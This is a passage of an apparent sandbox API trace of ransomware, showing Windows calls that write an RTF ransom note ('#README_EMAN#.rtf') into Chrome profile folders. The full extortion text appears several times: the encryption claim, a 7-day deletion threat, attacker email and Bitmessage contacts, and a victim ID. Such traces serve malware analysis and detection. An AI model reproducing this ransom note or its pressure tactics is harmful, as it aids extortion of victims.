r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.173] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.173] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9f\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0278.173] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.174] CloseHandle (hObject=0x294) returned 1 [0278.174] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\#readme_eman#.rtf")) returned 0x20 [0278.174] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\#readme_eman#.rtf")) returned 0x20 [0278.174] GetFileAttributesW 